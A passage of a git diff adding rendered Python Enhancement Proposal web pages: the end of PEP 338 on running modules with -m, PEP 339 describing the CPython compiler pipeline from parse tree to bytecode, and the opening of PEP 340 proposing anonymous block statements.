The release of 2.5b1 showed a surprising (although obvious in +retrospect) interaction between this PEP and PEP 328 - explicit +relative imports don’t work from a main module. This is due to +the fact that relative imports rely on __name__ to determine +the current module’s position in the package hierarchy. In a main +module, the value of __name__ is always '__main__', so +explicit relative imports will always fail (as they only work for +a module inside a package).

+

Investigation into why implicit relative imports appear to work when +a main module is executed directly but fail when executed using -m +showed that such imports are actually always treated as absolute +imports. Because of the way direct execution works, the package +containing the executed module is added to sys.path, so its sibling +modules are actually imported as top level modules. This can easily +lead to multiple copies of the sibling modules in the application if +implicit relative imports are used in modules that may be directly +executed (e.g. test modules or utility scripts).

+

For the 2.5 release, the recommendation is to always use absolute imports in any module that is intended to be used as a main module. The -m switch provides a benefit here, as it inserts the current directory into sys.path, instead of the directory containing the main module. This means that it is possible to run a module from inside a package using -m so long as the current directory contains the top level directory for the package. Absolute imports will work correctly even if the package isn’t installed anywhere else on sys.path. If the module is executed directly and uses absolute imports to retrieve its sibling modules, then the top level package directory needs to be installed somewhere on sys.path (since the current directory won’t be added automatically).

+

Here’s an example file layout:

+
devel/
+    pkg/
+        __init__.py
+        moduleA.py
+        moduleB.py
+        test/
+            __init__.py
+            test_A.py
+            test_B.py
+
+
+

So long as the current directory is devel, or devel is already on sys.path, and the test modules use absolute imports (such as import pkg.moduleA to retrieve the module under test), PEP 338 allows the tests to be run as:

+
python -m pkg.test.test_A
+python -m pkg.test.test_B
+
+
+

The question of whether or not relative imports should be supported +when a main module is executed with -m is something that will be +revisited for Python 2.6. Permitting it would require changes to +either Python’s import semantics or the semantics used to indicate +when a module is the main module, so it is not a decision to be made +hastily.

+
+
+

Resolved Issues

+

There were some key design decisions that influenced the development of +the runpy module. These are listed below.

+
    +
  • The special variables __name__, __file__ and __loader__ are set in a module’s global namespace before the module is executed. Because run_module alters these values, it does not mutate the supplied dictionary; if it did, then passing globals() to this function could have nasty side effects.
  • +
  • Sometimes, the information needed to populate the special variables +simply isn’t available. Rather than trying to be too clever, these +variables are simply set to None when the relevant information +cannot be determined.
  • +
  • There is no special protection on the alter_sys argument. +This may result in sys.argv[0] being set to None if file +name information is not available.
  • +
  • The import lock is NOT held while the executed module is running, so it does not protect against the potential threading issues that arise when alter_sys is set to True. Instead, it is recommended that threaded code simply avoid using this flag.
  • +
+
+
+

Alternatives

+

The first alternative implementation considered ignored packages’ +__path__ variables, and looked only in the main package directory. A +Python script with this behaviour can be found in the discussion of +the execmodule cookbook recipe [3].

+

The execmodule cookbook recipe itself was the proposed mechanism in +an earlier version of this PEP (before the PEP’s author read PEP 302).

+

Both approaches were rejected as they do not meet the main goal of the +-m switch – to allow the full Python namespace to be used to +locate modules for execution from the command line.

+

An earlier version of this PEP included some mistaken assumptions +about the way exec handled locals dictionaries and code from +function objects. These mistaken assumptions led to some unneeded +design complexity which has now been removed - run_code shares all +of the quirks of exec.

+

Earlier versions of the PEP also exposed a broader API than just the single run_module() function needed to implement the updates to the -m switch. In the interests of simplicity, those extra functions have been dropped from the proposed API.

+

After the original implementation in SVN, it became clear that holding +the import lock when executing the initial application script was not +correct (e.g. python -m test.regrtest test_threadedimport failed). +So the run_module function only holds the import lock during the +actual search for the module, and releases it before execution, even if +alter_sys is set.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0338.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0339/index.html b/pep-0339/index.html new file mode 100644 index 00000000000..e7cca5e2930 --- /dev/null +++ b/pep-0339/index.html @@ -0,0 +1,720 @@ + + + + + + + + PEP 339 – Design of the CPython Compiler | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 339 – Design of the CPython Compiler

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
02-Feb-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been withdrawn and moved to the Python +developer’s guide.

+
+
+

Abstract

+

Historically (through 2.4), compilation from source code to bytecode +involved two steps:

+
    +
  1. Parse the source code into a parse tree (Parser/pgen.c)
  2. Emit bytecode based on the parse tree (Python/compile.c)
+

This is not how a standard compiler works. The usual steps for compilation are:

+
    +
  1. Parse source code into a parse tree (Parser/pgen.c)
  2. Transform parse tree into an Abstract Syntax Tree (Python/ast.c)
  3. Transform AST into a Control Flow Graph (Python/compile.c)
  4. Emit bytecode based on the Control Flow Graph (Python/compile.c)
+

Starting with Python 2.5, the above steps are now used. This change was done to simplify compilation by breaking it into three steps. The purpose of this document is to outline how the latter three steps of the process work.

+

This document does not touch on how parsing works beyond what is needed to explain what compilation requires. It is also not exhaustive in terms of how the entire system works. You will most likely need to read some source to have an exact understanding of all details.

+
+
+

Parse Trees

+

Python’s parser is an LL(1) parser mostly based on the +implementation laid out in the Dragon Book [Aho86].

+

The grammar file for Python can be found in Grammar/Grammar, with the numeric values of grammar rules stored in Include/graminit.h. The numeric values for types of tokens (literal tokens, such as :, numbers, etc.) are kept in Include/token.h. The parse tree is made up of node * structs (as defined in Include/node.h).

+

Querying data from the node structs can be done with the following macros (which are all defined in Include/node.h):

+
    +
  • +
    CHILD(node *, int)
    Returns the nth child of the node using zero-offset indexing
    +
    +
  • +
  • +
    RCHILD(node *, int)
    Returns the nth child of the node from the right side; use +negative numbers!
    +
    +
  • +
  • +
    NCH(node *)
    Number of children the node has
    +
    +
  • +
  • +
    STR(node *)
    String representation of the node; e.g., will return : for a +COLON token
    +
    +
  • +
  • +
    TYPE(node *)
    The type of node as specified in Include/graminit.h
    +
    +
  • +
  • +
    REQ(node *, TYPE)
    Assert that the node is the type that is expected
    +
    +
  • +
  • +
    LINENO(node *)
    retrieve the line number of the source code that led to the +creation of the parse rule; defined in Python/ast.c
    +
    +
  • +
+

To tie all of this together, consider the rule for ‘while’:

+
while_stmt: 'while' test ':' suite ['else' ':' suite]
+
+
+

The node representing this will have TYPE(node) == while_stmt, and the number of children will be 4 or 7 depending on whether there is an ‘else’ clause. To access what should be the first ‘:’ and require it be an actual ‘:’ token, use REQ(CHILD(node, 2), COLON).
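The same parse tree could also be inspected from Python via the old stdlib parser module (long since deprecated and removed in 3.10); a small sketch:

import parser
import symbol

st = parser.suite("while x:\n    pass\n")
tup = st.totuple()   # nested tuples of (type, ...) mirroring the node * structs
print(symbol.sym_name[tup[0]])   # 'file_input' - numeric types map back to names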

+
+
+

Abstract Syntax Trees (AST)

+

The abstract syntax tree (AST) is a high-level representation of the +program structure without the necessity of containing the source code; +it can be thought of as an abstract representation of the source code. The +specification of the AST nodes is specified using the Zephyr Abstract +Syntax Definition Language (ASDL) [Wang97].

+

The definition of the AST nodes for Python is found in the file +Parser/Python.asdl .

+

Each AST node (representing statements, expressions, and several +specialized types, like list comprehensions and exception handlers) is +defined by the ASDL. Most definitions in the AST correspond to a +particular source construct, such as an ‘if’ statement or an attribute +lookup. The definition is independent of its realization in any +particular programming language.

+

The following fragment of the Python ASDL construct demonstrates the +approach and syntax:

+
module Python
+{
+      stmt = FunctionDef(identifier name, arguments args, stmt* body,
+                          expr* decorators)
+            | Return(expr? value) | Yield(expr value)
+            attributes (int lineno)
+}
+
+
+

The preceding example describes three different kinds of statements: function definitions, return statements, and yield statements. All three kinds are considered of type stmt, as shown by the ‘|’ separating the various kinds. They all take arguments of various kinds and amounts.

+

Modifiers on the argument type specify the number of values needed; ‘?’ +means it is optional, ‘*’ means 0 or more, no modifier means only one +value for the argument and it is required. FunctionDef, for instance, +takes an identifier for the name, ‘arguments’ for args, zero or more +stmt arguments for ‘body’, and zero or more expr arguments for +‘decorators’.

+

Do notice that something like ‘arguments’, which is a node type, is +represented as a single AST node and not as a sequence of nodes as with +stmt as one might expect.

+

All three kinds also have an ‘attributes’ argument; this is shown by the +fact that ‘attributes’ lacks a ‘|’ before it.

+

The statement definitions above generate the following C structure type:

+
typedef struct _stmt *stmt_ty;
+
+struct _stmt {
+      enum { FunctionDef_kind=1, Return_kind=2, Yield_kind=3 } kind;
+      union {
+              struct {
+                      identifier name;
+                      arguments_ty args;
+                      asdl_seq *body;
+              } FunctionDef;
+
+              struct {
+                      expr_ty value;
+              } Return;
+
+              struct {
+                      expr_ty value;
+              } Yield;
+      } v;
+      int lineno;
};
+
+
+

Also generated are a series of constructor functions that allocate (in +this case) a stmt_ty struct with the appropriate initialization. The +‘kind’ field specifies which component of the union is initialized. The +FunctionDef() constructor function sets ‘kind’ to FunctionDef_kind and +initializes the ‘name’, ‘args’, ‘body’, and ‘attributes’ fields.
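The stdlib ast module (added in 2.6, after this PEP was written) exposes these same ASDL-generated node types at the Python level, which makes the FunctionDef/Return definitions above easy to poke at:

import ast

tree = ast.parse("def f(x):\n    return x")
func = tree.body[0]
print(type(func).__name__)          # 'FunctionDef'
print(func.name)                    # 'f'
print(type(func.body[0]).__name__)  # 'Return'
print(func.lineno)                  # 1 - the 'attributes (int lineno)' field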

+
+
+

Memory Management

+

Before discussing the actual implementation of the compiler, a discussion of how memory is handled is in order. To make memory management simple, an arena is used. This means that memory is pooled in a single location for easy allocation and removal, which removes the need for explicit memory deallocation. Because all memory allocation in the compiler registers that memory with the arena, a single call to free the arena is all that is needed to completely free all memory used by the compiler.

+

In general, unless you are working on the critical core of the compiler, memory +management can be completely ignored. But if you are working at either the +very beginning of the compiler or the end, you need to care about how the arena +works. All code relating to the arena is in either Include/pyarena.h or +Python/pyarena.c .

+

PyArena_New() will create a new arena. The returned PyArena structure will store pointers to all memory given to it, doing the bookkeeping of what memory needs to be freed when the compiler is finished with it. That freeing is done with PyArena_Free(), which only needs to be called at the strategic points where the compiler exits.

+

As stated above, in general you should not have to worry about memory +management when working on the compiler. The technical details have been +designed to be hidden from you for most cases.

+

The only exception comes about when managing a PyObject. Since the rest of Python uses reference counting, there is extra support added to the arena to clean up each PyObject that was allocated. These cases are very rare. However, if you’ve allocated a PyObject, you must tell the arena about it by calling PyArena_AddPyObject().

+
+
+

Parse Tree to AST

+

The AST is generated from the parse tree (see Python/ast.c) using the +function PyAST_FromNode().

+

The function begins a tree walk of the parse tree, creating various AST +nodes as it goes along. It does this by allocating all new nodes it +needs, calling the proper AST node creation functions for any required +supporting functions, and connecting them as needed.

+

Do realize that there is no automatic or symbolic connection between the grammar specification and the nodes in the parse tree. No help is directly provided by the parse tree as in yacc.

+

For instance, one must keep track of which node in the parse tree +one is working with (e.g., if you are working with an ‘if’ statement +you need to watch out for the ‘:’ token to find the end of the conditional).

+

The functions called to generate AST nodes from the parse tree all have the name ast_for_xx, where xx is the grammar rule that the function handles (alias_for_import_name is the exception to this). These in turn call the constructor functions as defined by the ASDL grammar and contained in Python/Python-ast.c (which was generated by Parser/asdl_c.py) to create the nodes of the AST. This all leads to a sequence of AST nodes stored in asdl_seq structs.

+

Functions and macros for creating and using asdl_seq * types can be found in Python/asdl.c and Include/asdl.h:

+
    +
  • +
    asdl_seq_new()
    Allocate memory for an asdl_seq for the specified length
    +
    +
  • +
  • +
    asdl_seq_GET()
    Get item held at a specific position in an asdl_seq
    +
    +
  • +
  • +
    asdl_seq_SET()
    Set a specific index in an asdl_seq to the specified value
    +
    +
  • +
  • +
    asdl_seq_LEN(asdl_seq *)
    Return the length of an asdl_seq
    +
    +
  • +
+

If you are working with statements, you must also worry about keeping +track of what line number generated the statement. Currently the line +number is passed as the last parameter to each stmt_ty function.

+
+
+

Control Flow Graphs

+

A control flow graph (often referenced by its acronym, CFG) is a directed graph that models the flow of a program using basic blocks that contain the intermediate representation (abbreviated “IR”, in this case Python bytecode) within the blocks. A basic block is a block of IR that has a single entry point but possibly multiple exit points. The single entry point is the key to basic blocks; it all has to do with jumps. An entry point is the target of something that changes control flow (such as a function call or a jump), while exit points are instructions that would change the flow of the program (such as jumps and ‘return’ statements). What this means is that a basic block is a chunk of code that starts at the entry point and runs to an exit point or the end of the block.

+

As an example, consider an ‘if’ statement with an ‘else’ block. The +guard on the ‘if’ is a basic block which is pointed to by the basic +block containing the code leading to the ‘if’ statement. The ‘if’ +statement block contains jumps (which are exit points) to the true body +of the ‘if’ and the ‘else’ body (which may be NULL), each of which are +their own basic blocks. Both of those blocks in turn point to the +basic block representing the code following the entire ‘if’ statement.

+

CFGs are usually one step away from final code output. Code is directly +generated from the basic blocks (with jump targets adjusted based on the +output order) by doing a post-order depth-first search on the CFG +following the edges.
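The effect is easy to observe from Python with the dis module: compiling an ‘if’/‘else’ like the one described above and disassembling it shows the jump instructions that stitch the basic blocks together (a sketch; the exact opcode names vary between versions):

import dis

code = compile(
    "if cond:\n"
    "    x = 1\n"
    "else:\n"
    "    x = 2\n",
    "<demo>", "exec")
dis.dis(code)   # the jump instructions are the CFG edges, flattened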

+
+
+

AST to CFG to Bytecode

+

With the AST created, the next step is to create the CFG. The first step +is to convert the AST to Python bytecode without having jump targets +resolved to specific offsets (this is calculated when the CFG goes to +final bytecode). Essentially, this transforms the AST into Python +bytecode with control flow represented by the edges of the CFG.

+

Conversion is done in two passes. The first creates the namespace +(variables can be classified as local, free/cell for closures, or +global). With that done, the second pass essentially flattens the CFG +into a list and calculates jump offsets for final output of bytecode.

+

The conversion process is initiated by a call to the function PyAST_Compile() in Python/compile.c . This function does both the conversion of the AST to a CFG and the output of final bytecode from the CFG. The AST to CFG step is handled mostly by two functions called by PyAST_Compile(): PySymtable_Build() and compiler_mod(). The former is in Python/symtable.c while the latter is in Python/compile.c .

+

PySymtable_Build() begins by entering the starting code block for the +AST (passed-in) and then calling the proper symtable_visit_xx function +(with xx being the AST node type). Next, the AST tree is walked with +the various code blocks that delineate the reach of a local variable +as blocks are entered and exited using symtable_enter_block() and +symtable_exit_block(), respectively.
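The result of this pass is visible from Python through the stdlib symtable module, which wraps this machinery:

import symtable

top = symtable.symtable("def f(x):\n    y = x + 1\n    return y\n", "<demo>", "exec")
f_scope = top.get_children()[0]               # the symbol table for f()
print(f_scope.get_name())                     # 'f'
print(sorted(s.get_name() for s in f_scope.get_symbols()))  # ['x', 'y']
print(f_scope.lookup("y").is_local())         # True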

+

Once the symbol table is created, it is time for CFG creation, whose +code is in Python/compile.c . This is handled by several functions +that break the task down by various AST node types. The functions are +all named compiler_visit_xx where xx is the name of the node type (such +as stmt, expr, etc.). Each function receives a struct compiler * +and xx_ty where xx is the AST node type. Typically these functions +consist of a large ‘switch’ statement, branching based on the kind of +node type passed to it. Simple things are handled inline in the +‘switch’ statement with more complex transformations farmed out to other +functions named compiler_xx with xx being a descriptive name of what is +being handled.

+

When transforming an arbitrary AST node, use the VISIT() macro. +The appropriate compiler_visit_xx function is called, based on the value +passed in for <node type> (so VISIT(c, expr, node) calls +compiler_visit_expr(c, node)). The VISIT_SEQ macro is very similar, +but is called on AST node sequences (those values that were created as +arguments to a node that used the ‘*’ modifier). There is also +VISIT_SLICE() just for handling slices.

+

Emission of bytecode is handled by the following macros:

+
    +
  • +
    ADDOP()
    add a specified opcode
    +
    +
  • +
  • +
    ADDOP_I()
    add an opcode that takes an argument
    +
    +
  • +
  • +
    ADDOP_O(struct compiler *c, int op, PyObject *type, PyObject *obj)
    add an opcode with the proper argument based on the position of the +specified PyObject in PyObject sequence object, but with no handling of +mangled names; used for when you +need to do named lookups of objects such as globals, consts, or +parameters where name mangling is not possible and the scope of the +name is known
    +
    +
  • +
  • +
    ADDOP_NAME()
    just like ADDOP_O, but name mangling is also handled; used for +attribute loading or importing based on name
    +
    +
  • +
  • +
    ADDOP_JABS()
    create an absolute jump to a basic block
    +
    +
  • +
  • +
    ADDOP_JREL()
    create a relative jump to a basic block
    +
    +
  • +
+

There are several helper functions that emit bytecode; they are named compiler_xx(), where xx is what the function helps with (list, boolop, etc.). A rather useful one is compiler_nameop(). This function looks up the scope of a variable and, based on the expression context, emits the proper opcode to load, store, or delete the variable.

+

The line number on which a statement is defined is handled by compiler_visit_stmt(), and thus is not a worry.

+

In addition to emitting bytecode based on the AST node, handling the +creation of basic blocks must be done. Below are the macros and +functions used for managing basic blocks:

+
    +
  • +
    NEW_BLOCK()
    create block and set it as current
    +
    +
  • +
  • +
    NEXT_BLOCK()
    basically NEW_BLOCK() plus jump from current block
    +
    +
  • +
  • +
    compiler_new_block()
    create a block but don’t use it (used for generating jumps)
    +
    +
  • +
+

Once the CFG is created, it must be flattened and then final emission of bytecode occurs. Flattening is handled using a post-order depth-first search. Once flattened, jump offsets are backpatched based on the flattening and then a PyCodeObject is created. All of this is handled by calling assemble() .

+
+
+

Introducing New Bytecode

+

Sometimes a new feature requires a new opcode. But adding new bytecode is +not as simple as just suddenly introducing new bytecode in the AST -> +bytecode step of the compiler. Several pieces of code throughout Python depend +on having correct information about what bytecode exists.

+

First, you must choose a name and a unique identifier number. The official +list of bytecode can be found in Include/opcode.h . If the opcode is to take +an argument, it must be given a unique number greater than that assigned to +HAVE_ARGUMENT (as found in Include/opcode.h).

+

Once the name/number pair +has been chosen and entered in Include/opcode.h, you must also enter it into +Lib/opcode.py and Doc/library/dis.rst .
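The Lib/opcode.py side of this bookkeeping is importable, which is handy for checking that a name/number pair was wired up correctly:

import opcode

num = opcode.opmap["RETURN_VALUE"]     # name -> numeric identifier
print(num, opcode.opname[num])         # and back again
print(opcode.HAVE_ARGUMENT)            # opcodes >= this value take an argument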

+

With a new bytecode you must also change what is called the magic number for .pyc files. The variable MAGIC in Python/import.c contains the number. Changing this number will cause all .pyc files with the old MAGIC to be recompiled by the interpreter on import.
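The current magic number can be read from Python (in the 2.x era via imp.get_magic(); in modern CPython it is exposed as shown in this sketch):

import importlib.util

# Four bytes, bumped whenever the bytecode format changes; stale .pyc
# files are detected by comparing against this value.
print(importlib.util.MAGIC_NUMBER)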

+

Finally, you need to introduce the use of the new bytecode. Altering +Python/compile.c and Python/ceval.c will be the primary places to change. +But you will also need to change the ‘compiler’ package. The key files +to do that are Lib/compiler/pyassem.py and Lib/compiler/pycodegen.py .

+

If you make a change here that can affect the output of bytecode that already exists, and you do not bump the magic number every time, make sure to delete your old .py(c|o) files! Even though you will eventually change the magic number if you change the bytecode, while you are debugging your work you will be changing the bytecode output without constantly bumping the magic number. This leaves you with stale .pyc files that will not be recreated. Running find . -name '*.py[co]' -exec rm -f {} ';' will delete all .pyc files you have, forcing new ones to be created and thus allowing you to test out your new bytecode properly.

+
+
+

Code Objects

+

The result of PyAST_Compile() is a PyCodeObject which is defined in +Include/code.h . And with that you now have executable Python bytecode!

+

Code objects (bytecode) are executed in Python/ceval.c . This file will also need a new case statement for the new opcode in the big switch statement in PyEval_EvalFrameEx().

+
+
+

Important Files

+
    +
  • Parser/
      +
    • +
      Python.asdl
      ASDL syntax file
      +
      +
    • +
    • +
      asdl.py
      “An implementation of the Zephyr Abstract Syntax Definition +Language.” Uses SPARK to parse the ASDL files.
      +
      +
    • +
    • +
      asdl_c.py
      “Generate C code from an ASDL description.” Generates +Python/Python-ast.c and Include/Python-ast.h .
      +
      +
    • +
    • +
      spark.py
      SPARK parser generator
      +
      +
    • +
    +
  • +
  • Python/
      +
    • +
      Python-ast.c
      Creates C structs corresponding to the ASDL types. Also +contains code for marshaling AST nodes (core ASDL types have +marshaling code in asdl.c). “File automatically generated by +Parser/asdl_c.py”. This file must be committed separately +after every grammar change is committed since the __version__ +value is set to the latest grammar change revision number.
      +
      +
    • +
    • +
      asdl.c
      Contains code to handle the ASDL sequence type. Also has code to handle marshaling the core ASDL types, such as number and identifier. Used by Python-ast.c for marshaling AST nodes.
      +
      +
    • +
    • +
      ast.c
      Converts Python’s parse tree into the abstract syntax tree.
      +
      +
    • +
    • +
      ceval.c
      Executes byte code (aka, eval loop).
      +
      +
    • +
    • +
      compile.c
      Emits bytecode based on the AST.
      +
      +
    • +
    • +
      symtable.c
      Generates a symbol table from AST.
      +
      +
    • +
    • +
      pyarena.c
      Implementation of the arena memory manager.
      +
      +
    • +
    • +
      import.c
      Home of the magic number (named MAGIC) for bytecode versioning
      +
      +
    • +
    +
  • +
  • Include/
      +
    • +
      Python-ast.h
      Contains the actual definitions of the C structs as generated by +Python/Python-ast.c . +“Automatically generated by Parser/asdl_c.py”.
      +
      +
    • +
    • +
      asdl.h
      Header for the corresponding Python/asdl.c .
      +
      +
    • +
    • +
      ast.h
      Declares PyAST_FromNode() external (from Python/ast.c).
      +
      +
    • +
    • +
      code.h
      Header file for Objects/codeobject.c; contains definition of +PyCodeObject.
      +
      +
    • +
    • +
      symtable.h
      Header for Python/symtable.c . struct symtable and +PySTEntryObject are defined here.
      +
      +
    • +
    • +
      pyarena.h
      Header file for the corresponding Python/pyarena.c .
      +
      +
    • +
    • +
      opcode.h
      Master list of bytecode; if this file is modified you must modify +several other files accordingly (see “Introducing New Bytecode”)
      +
      +
    • +
    +
  • +
  • Objects/
      +
    • +
      codeobject.c
      Contains PyCodeObject-related code (originally in +Python/compile.c).
      +
      +
    • +
    +
  • +
  • Lib/
      +
    • +
      opcode.py
      One of the files that must be modified if Include/opcode.h is.
      +
      +
    • +
    • compiler/
        +
      • +
        pyassem.py
        One of the files that must be modified if Include/opcode.h is +changed.
        +
        +
      • +
      • +
        pycodegen.py
        One of the files that must be modified if Include/opcode.h is +changed.
        +
        +
      • +
      +
    • +
    +
  • +
+
+ +
+

References

+
+
+
[Aho86]
+
Alfred V. Aho, Ravi Sethi, Jeffrey D. Ullman. +Compilers: Principles, Techniques, and Tools, +http://www.amazon.com/exec/obidos/tg/detail/-/0201100886/104-0162389-6419108
+
+
[Wang97]
+
Daniel C. Wang, Andrew W. Appel, Jeff L. Korn, and Chris +S. Serra. The Zephyr Abstract Syntax Description Language. +In Proceedings of the Conference on Domain-Specific Languages, pp. +213–227, 1997.
+
+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0339.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0340/index.html b/pep-0340/index.html new file mode 100644 index 00000000000..2561d2087b2 --- /dev/null +++ b/pep-0340/index.html @@ -0,0 +1,671 @@ + + + + + + + + PEP 340 – Anonymous Block Statements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 340 – Anonymous Block Statements

+
+
Author:
+
Guido van Rossum
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP proposes a new type of compound statement which can be +used for resource management purposes. The new statement type +is provisionally called the block-statement because the keyword +to be used has not yet been chosen.

+

This PEP competes with several other PEPs: PEP 288 (Generators +Attributes and Exceptions; only the second part), PEP 310 +(Reliable Acquisition/Release Pairs), and PEP 325 +(Resource-Release Support for Generators).

+

I should clarify that using a generator to “drive” a block +statement is really a separable proposal; with just the definition +of the block statement from the PEP you could implement all the +examples using a class (similar to example 6, which is easily +turned into a template). But the key idea is using a generator to +drive a block statement; the rest is elaboration, so I’d like to +keep these two parts together.

+

(PEP 342, Enhanced Iterators, was originally a part of this PEP; +but the two proposals are really independent and with Steven +Bethard’s help I have moved it to a separate PEP.)

+
+
+

Rejection Notice

+

I am rejecting this PEP in favor of PEP 343. See the motivational +section in that PEP for the reasoning behind this rejection. GvR.

+
+
+

Motivation and Summary

+

(Thanks to Shane Hathaway – Hi Shane!)

+

Good programmers move commonly used code into reusable functions. +Sometimes, however, patterns arise in the structure of the +functions rather than the actual sequence of statements. For +example, many functions acquire a lock, execute some code specific +to that function, and unconditionally release the lock. Repeating +the locking code in every function that uses it is error prone and +makes refactoring difficult.

+

Block statements provide a mechanism for encapsulating patterns of +structure. Code inside the block statement runs under the control +of an object called a block iterator. Simple block iterators +execute code before and after the code inside the block statement. +Block iterators also have the opportunity to execute the +controlled code more than once (or not at all), catch exceptions, +or receive data from the body of the block statement.

+

A convenient way to write block iterators is to write a generator +(PEP 255). A generator looks a lot like a Python function, but +instead of returning a value immediately, generators pause their +execution at “yield” statements. When a generator is used as a +block iterator, the yield statement tells the Python interpreter +to suspend the block iterator, execute the block statement body, +and resume the block iterator when the body has executed.

+

The Python interpreter behaves as follows when it encounters a +block statement based on a generator. First, the interpreter +instantiates the generator and begins executing it. The generator +does setup work appropriate to the pattern it encapsulates, such +as acquiring a lock, opening a file, starting a database +transaction, or starting a loop. Then the generator yields +execution to the body of the block statement using a yield +statement. When the block statement body completes, raises an +uncaught exception, or sends data back to the generator using a +continue statement, the generator resumes. At this point, the +generator can either clean up and stop or yield again, causing the +block statement body to execute again. When the generator +finishes, the interpreter leaves the block statement.
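For comparison only: this is essentially the pattern that eventually shipped via PEP 343’s with statement and contextlib.contextmanager, rather than the block keyword proposed here:

from contextlib import contextmanager
import threading

@contextmanager
def locking(lock):
    lock.acquire()
    try:
        yield          # the body of the with statement runs here
    finally:
        lock.release()

my_lock = threading.Lock()
with locking(my_lock):
    print("lock held; released on any exit path")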

+
+
+

Use Cases

+

See the Examples section near the end.

+
+
+

Specification: the __exit__() Method

+

An optional new method for iterators is proposed, called +__exit__(). It takes up to three arguments which correspond to +the three “arguments” to the raise-statement: type, value, and +traceback. If all three arguments are None, sys.exc_info() may be +consulted to provide suitable default values.

+
+
+

Specification: the Anonymous Block Statement

+

A new statement is proposed with the syntax:

+
block EXPR1 as VAR1:
+    BLOCK1
+
+
+

Here, ‘block’ and ‘as’ are new keywords; EXPR1 is an arbitrary +expression (but not an expression-list) and VAR1 is an arbitrary +assignment target (which may be a comma-separated list).

+

The “as VAR1” part is optional; if omitted, the assignments to +VAR1 in the translation below are omitted (but the expressions +assigned are still evaluated!).

+

The choice of the ‘block’ keyword is contentious; many +alternatives have been proposed, including not to use a keyword at +all (which I actually like). PEP 310 uses ‘with’ for similar +semantics, but I would like to reserve that for a with-statement +similar to the one found in Pascal and VB. (Though I just found +that the C# designers don’t like ‘with’ [2], and I have to agree +with their reasoning.) To sidestep this issue momentarily I’m +using ‘block’ until we can agree on the right keyword, if any.

+

Note that the ‘as’ keyword is not contentious (it will finally be +elevated to proper keyword status).

+

Note that it is up to the iterator to decide whether a block-statement represents a loop with multiple iterations; in the most common use case BLOCK1 is executed exactly once. To the parser, however, it is always a loop; break and continue transfer control to the block’s iterator (see below for details).

+

The translation is subtly different from a for-loop: iter() is not called, so EXPR1 should already be an iterator (not just an iterable); and the iterator is guaranteed to be notified when the block-statement is left, regardless of whether this is due to a break, return or exception:

+
itr = EXPR1  # The iterator
+ret = False  # True if a return statement is active
+val = None   # Return value, if ret == True
+exc = None   # sys.exc_info() tuple if an exception is active
+while True:
+    try:
+        if exc:
+            ext = getattr(itr, "__exit__", None)
+            if ext is not None:
+                VAR1 = ext(*exc)   # May re-raise *exc
+            else:
+                raise exc[0], exc[1], exc[2]
+        else:
+            VAR1 = itr.next()  # May raise StopIteration
+    except StopIteration:
+        if ret:
+            return val
+        break
+    try:
+        ret = False
+        val = exc = None
+        BLOCK1
+    except:
+        exc = sys.exc_info()
+
+
+

(However, the variables ‘itr’ etc. are not user-visible and the +built-in names used cannot be overridden by the user.)

+

Inside BLOCK1, the following special translations apply:

+
    +
  • “break” is always legal; it is translated into:
    exc = (StopIteration, None, None)
    +continue
    +
    +
    +
  • +
  • “return EXPR3” is only legal when the block-statement is +contained in a function definition; it is translated into:
    exc = (StopIteration, None, None)
    +ret = True
    +val = EXPR3
    +continue
    +
    +
    +
  • +
+

The net effect is that break and return behave much the same as +if the block-statement were a for-loop, except that the iterator +gets a chance at resource cleanup before the block-statement is +left, through the optional __exit__() method. The iterator also +gets a chance if the block-statement is left through raising an +exception. If the iterator doesn’t have an __exit__() method, +there is no difference with a for-loop (except that a for-loop +calls iter() on EXPR1).

+

Note that a yield-statement in a block-statement is not treated +differently. It suspends the function containing the block +without notifying the block’s iterator. The block’s iterator is +entirely unaware of this yield, since the local control flow +doesn’t actually leave the block. In other words, it is not +like a break or return statement. When the loop that was resumed +by the yield calls next(), the block is resumed right after the +yield. (See example 7 below.) The generator finalization +semantics described below guarantee (within the limitations of all +finalization semantics) that the block will be resumed eventually.

+

Unlike the for-loop, the block-statement does not have an +else-clause. I think it would be confusing, and emphasize the +“loopiness” of the block-statement, while I want to emphasize its +difference from a for-loop. In addition, there are several +possible semantics for an else-clause, and only a very weak use +case.

+
+
+

Specification: Generator Exit Handling

+

Generators will implement the new __exit__() method API.

+

Generators will be allowed to have a yield statement inside a +try-finally statement.

+

The expression argument to the yield-statement will become +optional (defaulting to None).

+

When __exit__() is called, the generator is resumed but at the +point of the yield-statement the exception represented by the +__exit__ argument(s) is raised. The generator may re-raise this +exception, raise another exception, or yield another value, +except that if the exception passed in to __exit__() was +StopIteration, it ought to raise StopIteration (otherwise the +effect would be that a break is turned into continue, which is +unexpected at least). When the initial call resuming the +generator is an __exit__() call instead of a next() call, the +generator’s execution is aborted and the exception is re-raised +without passing control to the generator’s body.

+

When a generator that has not yet terminated is garbage-collected +(either through reference counting or by the cyclical garbage +collector), its __exit__() method is called once with +StopIteration as its first argument. Together with the +requirement that a generator ought to raise StopIteration when +__exit__() is called with StopIteration, this guarantees the +eventual activation of any finally-clauses that were active when +the generator was last suspended. Of course, under certain +circumstances the generator may never be garbage-collected. This +is no different than the guarantees that are made about finalizers +(__del__() methods) of other objects.

+
+
+

Alternatives Considered and Rejected

+
    +
  • Many alternatives have been proposed for ‘block’. I haven’t +seen a proposal for another keyword that I like better than +‘block’ yet. Alas, ‘block’ is also not a good choice; it is a +rather popular name for variables, arguments and methods. +Perhaps ‘with’ is the best choice after all?
  • +
